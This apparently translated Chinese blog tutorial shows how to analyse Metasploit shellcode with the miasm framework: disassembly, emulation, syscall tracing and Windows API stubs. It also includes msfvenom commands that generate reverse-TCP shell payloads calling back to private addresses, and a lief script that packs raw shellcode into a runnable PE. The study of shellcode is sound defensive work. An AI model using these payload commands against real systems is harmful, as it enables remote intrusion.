黑客信息网:如何利用Miasm分析Shellcode
Shellcode是一种非常有趣的软件,因为它们必须在不寻常的限制条件下运行。同时,它们也非常小巧,非常适合用来学习新的工具。老实说,我想学习miasm的念头由来已久(自从几年前在SSTIC安全大会上看到第一次演示后,这种想法就在脑子里扎下根了),但是知道最近一段时间,我们才抽出时间将其拿下,本文就是一个简短的总结。
让我们先从Linux平台下面的shellcode开始着手,因为它们比Windows平台下面的shellcode要简单一些。
msfvenom -p linux/x86/exec CMD=/bin/ls -a x86 --platform linux -f raw > sc_linux1
让我们用miasm对上面的shellcode进行反汇编处理:
from miasm.analysis.binary import Container
from miasm.analysis.machine import Machine
with open("sc_linux1", "rb") as f:
buf=f.read()
container=Container.from_string(buf)
machine=Machine('x86_32')
mdis=machine.dis_engine(container.bin_stream)
mdis.follow_call=True # Follow calls
mdis.dontdis_retcall=True # Don't disassemble after calls
disasm=mdis.dis_multiblock(offset=0)
print(disasm)
我们将得到以下代码:
loc_key_0
PUSH 0xB
POP EAX
CDQ
PUSH EDX
PUSHW 0x632D
MOV EDI, ESP
PUSH 0x68732F
PUSH 0x6E69622F
MOV EBX, ESP
PUSH EDX
CALL loc_key_1
-> c_to:loc_key_1
loc_key_1
PUSH EDI
PUSH EBX
MOV ECX, ESP
INT 0x80
[SNIP]
其中,INT 0x80是调用系统,而syscall代码在第一行就被移到了EAX寄存器中,0xB是execve的代码。我们可以很容易地得到CALL loc_key_1后的数据地址,方法是取该指令地址+size与loc_key1的地址之间的数据:
> inst=list(disasm.blocks)[0].lines[10] # Instruction 10 of block 0
> print(buf[inst.offset+inst.l:disasm.loc_db.offsets[1]])
b'/bin/ls\x00'
接下来,让我们生成一个更复杂的shellcode:
msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.2.2.14 LPORT=1234 -f raw > sc_linux2
由于代码中使用了条件跳转,因此,它更适合用图形方式进行解读:
from miasm.analysis.binary import Container
from miasm.analysis.machine import Machine
with open("sc_linux2", "rb") as f:
buf=f.read()
container=Container.from_string(buf)
machine=Machine('x86_32')
mdis=machine.dis_engine(container.bin_stream)
mdis.follow_call=True # Follow calls
mdis.dontdis_retcall=True # Don't disassemble after calls
disasm=mdis.dis_multiblock(offset=0)
open('bin_cfg.dot', 'w').write(disasm.dot())
通过静态方式理解上述代码难度较大,所以,不妨试试能否用miasm来模拟它。
实际上,模拟指令是件非常简单的事情:
from miasm.analysis.machine import Machine
from miasm.jitter.csts import PAGE_READ, PAGE_WRITE
myjit=Machine("x86_32").jitter("python")
myjit.init_stack()
data=open('sc_linux2', 'rb').read()
run_addr=0x40000000
myjit.vm.add_memory_page(run_addr, PAGE_READ | PAGE_WRITE, data)
myjit.set_trace_log()
myjit.run(run_addr)
Miasm将模拟所有指令,直到我们到达第一个int 0x80调用为止:
40000000 PUSH 0xA
EAX 00000000 EBX 00000000 ECX 00000000 EDX 00000000 ESI 00000000 EDI 00000000 ESP 0123FFFC EBP 00000000 EIP 40000002 zf 0 nf 0 of 0 cf 0
40000002 POP ESI
EAX 00000000 EBX 00000000 ECX 00000000 EDX 00000000 ESI 0000000A EDI 00000000 ESP 01240000 EBP 00000000 EIP 40000003 zf 0 nf 0 of 0 cf 0
[SNIP]
40000010 INT 0x80
EAX 00000066 EBX 00000001 ECX 0123FFF4 EDX 00000000 ESI 0000000A EDI 00000000 ESP 0123FFF4 EBP 00000000 EIP 40000012 zf 0 nf 0 of 0 cf 0
Traceback (most recent call last):
File "linux1.py", line 11, in
myjit.run(run_addr)
File "/home/user/tools/malware/miasm/miasm/jitter/jitload.py", line 423, in run
return self.continue_run()
File "/home/user/tools/malware/miasm/miasm/jitter/jitload.py", line 405, in continue_run
return next(self.run_iterator)
File "/home/user/tools/malware/miasm/miasm/jitter/jitload.py", line 373, in runiter_once
assert(self.get_exception()==0)
AssertionError
默认情况下,miasm机器不会执行系统调用,但是可以为异常EXCEPT_INT_XX(对于Linux x86_64而言为EXCEPT_SYSCALL)添加一个异常处理程序并自己实现它。让我们先显示一下syscall编号:
from miasm.jitter.csts import PAGE_READ, PAGE_WRITE, EXCEPT_INT_XX
from miasm.analysis.machine import Machine
def exception_int(jitter):
print("Syscall: {}".format(jitter.cpu.EAX))
return True
myjit=Machine("x86_32").jitter("python")
myjit.init_stack()
data=open('sc_linux2', 'rb').read()
run_addr=0x40000000
myjit.vm.add_memory_page(run_addr, PAGE_READ | PAGE_WRITE, data)
myjit.add_exception_handler(EXCEPT_INT_XX, exception_int)
myjit.run(run_addr)
输出的syscall为:
Syscall: 102
Syscall: 102
刚开始的时候,我曾经自己重新实现过shellcode经常使用的几个syscall,后来才发现miasm本身已经集成了许多syscall的实现和一种让虚拟机执行它们的方法。
我已经提交了几个额外的系统调用的PR,这样我们可以模拟shellcode了:
myjit=Machine("x86_32").jitter("python")
myjit.init_stack()
data=open("sc_linux2", 'rb').read()
run_addr=0x40000000
myjit.vm.add_memory_page(run_addr, PAGE_READ | PAGE_WRITE, data)
log=logging.getLogger('syscalls')
log.setLevel(logging.DEBUG)
env=environment.LinuxEnvironment_x86_32()
syscall.enable_syscall_handling(myjit, env, syscall.syscall_callbacks_x86_32)
myjit.run(run_addr)
并得到以下系统调用跟踪结果:
[DEBUG ]: socket(AF_INET, SOCK_STREAM, 0)
[DEBUG ]: -> 3
[DEBUG ]: connect(fd, [AF_INET, 1234, 10.2.2.14], 102)
[DEBUG ]: -> 0
[DEBUG ]: sys_mprotect(123f000, 1000, 7)
[DEBUG ]: -> 0
[DEBUG ]: sys_read(3, 123ffe4, 24)
所以,用miasm分析linux的shellcode是非常容易的一件事情,同时,您还可以用这个脚本。
因为在Windows上无法使用系统调用相关的指令,所以Windows的shellcodes需要借助于共享库中的函数,这就需要用LoadLibrary和GetProcAddress函数来进行加载,为此,就需要先在内存中的kernel32.dll DLL文件中找到这两个函数地址。
下面,让我们用metasploit生成第一个shellcode:
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 -f raw > sc_windows1
我们可以用前面介绍的代码生成一个调用图:
在这里,我们看到了大多数shellcode用来获取自己地址的技巧之一,CALL指令会将堆栈中下一条指令的地址压入堆栈中,然后用POP指令将其存储到EBP寄存器中。这样,最后一条指令CALL EBP,将会调用在第一个调用指令之后的指令。同时,由于这里只使用了静态分析,所以miasm并不知道哪个地址位于EBP寄存器中。
我们仍然可以通过手动方式来反汇编位于第一个调用指令后面的代码:
inst=inst=list(disasm.blocks)[0].lines[1] # We get the second line of the first block
next_addr=inst.offset + inst.l # offset + size of the instruction
disasm=mdis.dis_multiblock(offset=next_addr)
open('bin_cfg.dot', 'w').write(disasm.dot())
这里我们看到,shellcode首先是通过跟踪内存中的PEB、PEB_LDR_DATA和LDR_DATA_TABLE_ENTRY结构体来寻找kernel32的地址的。下面,让我们来模拟一下:
from miasm.jitter.csts import PAGE_READ, PAGE_WRITE
from miasm.analysis.machine import Machine
def code_sentinelle(jitter):
jitter.run=False
jitter.pc=0
return True
myjit=Machine("x86_32").jitter("python")
myjit.init_stack()
data=open("sc_windows1", 'rb').read()
run_addr=0x40000000
myjit.vm.add_memory_page(run_addr, PAGE_READ | PAGE_WRITE, data)
myjit.set_trace_log()
myjit.push_uint32_t(0x1337beef)
myjit.add_breakpoint(0x1337beef, code_sentinelle)
myjit.run(run_addr)
40000000 CLD
EAX 00000000 EBX 00000000 ECX 00000000 EDX 00000000 ESI 00000000 EDI 00000000 ESP 0123FFFC EBP 00000000 EIP 40000001 zf 0 nf 0 of 0 cf 0
40000001 CALL loc_40000088
EAX 00000000 EBX 00000000 ECX 00000000 EDX 00000000 ESI 00000000 EDI 00000000 ESP 0123FFF8 EBP 00000000 EIP 40000088 zf 0 nf 0 of 0 cf 0
40000088 POP EBP
EAX 00000000 EBX 00000000 ECX 00000000 EDX 00000000 ESI 00000000 EDI 00000000 ESP 0123FFFC EBP 40000006 EIP 40000089 zf 0 nf 0 of 0 cf 0
40000089 PUSH 0x3233
EAX 00000000 EBX 00000000 ECX 00000000 EDX 00000000 ESI 00000000 EDI 00000000 ESP 0123FFF8 EBP 40000006 EIP 4000008E zf 0 nf 0 of 0 cf 0
[SNIP]
4000000B MOV EDX, DWORD PTR FS:[EAX + 0x30]
WARNING: address 0x30 is not mapped in virtual memory:
Traceback (most recent call last):
[SNIP]
RuntimeError: Cannot find address
模拟过程一直正常,直到到达MOV EDX,DWORD PTR FS:[EAX + 0x30]指令为止,这条指令用于从内存中的FS段获取TEB结构体的地址。但在这种情况下,miasm只是在模拟代码,并没有加载内存中的任何系统段。为此,我们需要使用完整的Windows沙箱来运行miasm,但是这些虚拟机只是运行PE文件,所以我们首先需要借助于一个简短的脚本,通过lief将shellcode转换为一个完整的PE文件:
from lief import PE
with open("sc_windows1", "rb") as f:
data=f.read()
binary32=PE.Binary("pe_from_scratch", PE.PE_TYPE.PE32)
section_text =PE.Section(".text")
section_text.content =[c for c in data] # Take a list(int)
section_text.virtual_address=0x1000
section_text=binary32.add_section(section_text, PE.SECTION_TYPES.TEXT)
binary32.optional_header.addressof_entrypoint=section_text.virtual_address
builder=PE.Builder(binary32)
builder.build_imports(True)
builder.build()
builder.write("sc_windows1.exe")
现在,让我们用miasm沙箱来运行这个PE,并通过use-windows-structs选项将Windows结构体加载到内存中(完整的代码可以从这里下载):
from miasm.analysis.sandbox import Sandbox_Win_x86_32
class Options():
def __init__(self):
self.use_windows_structs=True
self.jitter="gcc"
#self.singlestep=True
self.usesegm=True
self.load_hdr=True
self.loadbasedll=True
def __getattr__(self, name):
return None
options=Options()
# Create sandbox
sb=Sandbox_Win_x86_32("sc_windows1.exe", options, globals())
sb.run()
assert(sb.jitter.run is False)
选项loadbasedll的作用,就是根据名为win_dll的文件夹中现有的dll,向内存中加载相应的DLL结构(比如所需的Windows x86_32 DLL)。在执行时,将引发崩溃:
[SNIP]
[INFO ]: kernel32_LoadLibrary(dllname=0x13ffe8) ret addr: 0x40109b
[WARNING ]: warning adding .dll to modulename
[WARNING ]: ws2_32.dll
Traceback (most recent call last):
File "windows4.py", line 18, in
sb.run()
[SNIP]
File "/home/user/tools/malware/miasm/miasm/jitter/jitload.py", line 479, in handle_lib
raise ValueError('unknown api', hex(jitter.pc), repr(fname))
ValueError: ('unknown api', '0x71ab6a55', "'ws2_32_WSAStartup'")
如果我们查看文件jitload.py,就会发现它实际上调用了在win_api_x86_32.py中实现的DLL函数,并且其中确实实现了kernel32_LoadLibrary,但是并没有实现WSAStartup函数,因此,我们需要自己动手实现该函数。
Miasm实际上使用了一种非常聪明的技巧来简化新库的实现:沙箱可以接受一个表示其他函数的参数,并且在默认情况下,Miasm会使用globals()来调用这些函数。这就意味着,我们只需要在代码中定义一个具有正确名称的函数,它就可以直接用作系统函数。为此,让我们尝试使用ws2_32_WSAStartup函数:
def ws2_32_WSAStartup(jitter):
print("WSAStartup(wVersionRequired, lpWSAData)")
ret_ad, args=jitter.func_args_stdcall(["wVersionRequired", "lpWSAData"])
jitter.func_ret_stdcall(ret_ad, 0)
现在,我们得到如下所示的输出:
INFO ]: kernel32_LoadLibrary(dllname=0x13ffe8) ret addr: 0x40109b
[WARNING ]: warning adding .dll to modulename
[WARNING ]: ws2_32.dll
WSAStartup(wVersionRequired, lpWSAData)
Traceback (most recent call last):
[SNIP]
File "/home/user/tools/malware/miasm/miasm/jitter/jitload.py", line 479, in handle_lib
raise ValueError('unknown api', hex(jitter.pc), repr(fname))
ValueError: ('unknown api', '0x71ab8b6a', "'ws2_32_WSASocketA'")
我们可以沿用这种方式,来逐一实现shellcode调用的几个函数:
def ws2_32_WSASocketA(jitter):
"""
SOCKET WSAAPI WSASocketA(
int af,
int type,
int protocol,
LPWSAPROTOCOL_INFOA lpProtocolInfo,
GROUP g,
DWORD dwFlags
);
"""
ADDRESS_FAM={2: "AF_INET", 23: "AF_INET6"}
TYPES={1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTOCOLS={0: "Whatever", 6: "TCP", 17: "UDP"}
ret_ad, args=jitter.func_args_stdcall(["af", "type", "protocol", "lpProtocolInfo", "g", "dwFlags"])
print("WSASocketA({}, {}, {}, ...)".format(
ADDRESS_FAM[args.af],
TYPES[args.type],
PROTOCOLS[args.protocol]
))
jitter.func_ret_stdcall(ret_ad, 14)
def ws2_32_connect(jitter):
ret_ad, args=jitter.func_args_stdcall(["s", "name", "namelen"])
sockaddr=jitter.vm.get_mem(args.name, args.namelen)
family=struct.unpack("H", sockaddr[0:2])[0]
if family==2:
port=struct.unpack(">H", sockaddr[2:4])[0]
ip=".".join([str(i) for i in struct.unpack("BBBB", sockaddr[4:8])])
print("socket_connect(fd, [{}, {}, {}], {})".format("AF_INET", port, ip, args.namelen))
else:
print("connect()")
jitter.func_ret_stdcall(ret_ad, 0)
def kernel32_CreateProcessA(jitter):
ret_ad, args=jitter.func_args_stdcall(["lpApplicationName", "lpCommandLine", "lpProcessAttributes", "lpThreadAttributes", "bInheritHandles", "dwCreationFlags", "lpEnvironment", "lpCurrentDirectory", "lpStartupInfo", "lpProcessInformation"])
jitter.func_ret_stdcall(ret_ad, 0)
def kernel32_ExitProcess(jitter):
ret_ad, args=jitter.func_args_stdcall(["uExitCode"])
jitter.func_ret_stdcall(ret_ad, 0)
jitter.run=False
最后,我们就可以完美地仿真shellcode了:
[INFO ]: Add module 400000 'sc_windows1.exe'
[INFO ]: Add module 7c900000 'ntdll.dll'
[INFO ]: Add module 7c800000 'kernel32.dll'
[INFO ]: Add module 7e410000 'use***.dll'
[INFO ]: Add module 774e0000 'ole32.dll'
[INFO ]: Add module 7e1e0000 'urlmon.dll'
[INFO ]: Add module 71ab0000 'ws2_32.dll'
[INFO ]: Add module 77dd0000 'advapi32.dll'
[INFO ]: Add module 76bf0000 'psapi.dll'
[INFO ]: kernel32_LoadLibrary(dllname=0x13ffe8) ret addr: 0x40109b
[WARNING ]: warning adding .dll to modulename
[WARNING ]: ws2_32.dll
WSAStartup(wVersionRequired, lpWSAData)
[INFO ]: ws2_32_WSAStartup(wVersionRequired=0x190, lpWSAData=0x13fe58) ret addr: 0x4010ab
[INFO ]: ws2_32_WSASocketA(af=0x2, type=0x1, protocol=0x0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) ret addr: 0x4010ba
WSASocketA(AF_INET, SOCK_STREAM, Whatever, ...)
[INFO ]: ws2_32_connect(s=0xe, name=0x13fe4c, namelen=0x10) ret addr: 0x4010d4
socket_connect(fd, [AF_INET, 443, 192.168.56.1], 16)
[INFO ]: kernel32_CreateProcessA(lpApplicationName=0x0, lpCommandLine=0x13fe48, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0x1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x13fe04, lpProcessInformation=0x13fdf4) ret addr: 0x401117
[INFO ]: kernel32_WaitForSingleObject(handle=0x0, dwms=0xffffffff) ret addr: 0x401125
[INFO ]: kernel32_GetVersion() ret addr: 0x401131
[INFO ]: kernel32_ExitProcess(uExitCode=0x0) ret addr: 0x401144
实际上,学习miasm的确是一件非常有趣的事情。我发现,miasm非常强大(我甚至还没有探索过符号执行功能)。当然,它并不是我们唯一可用的工具(例如triton也在做同样的事情),但我发现miasm不仅写得很好,功能也更加丰富。不过,它唯一的缺点就是目前还缺乏相关的说明文档。如果您想开始学习miasm,不妨参阅这里的示例和相关文章,它们是很好的起点。Willi Ballenthin最近也写了几篇博文,我觉得也很有帮助。最后,当您学有心得之后,那不妨也为丰富miasm资料贡献自己一份力量吧!
原文地址: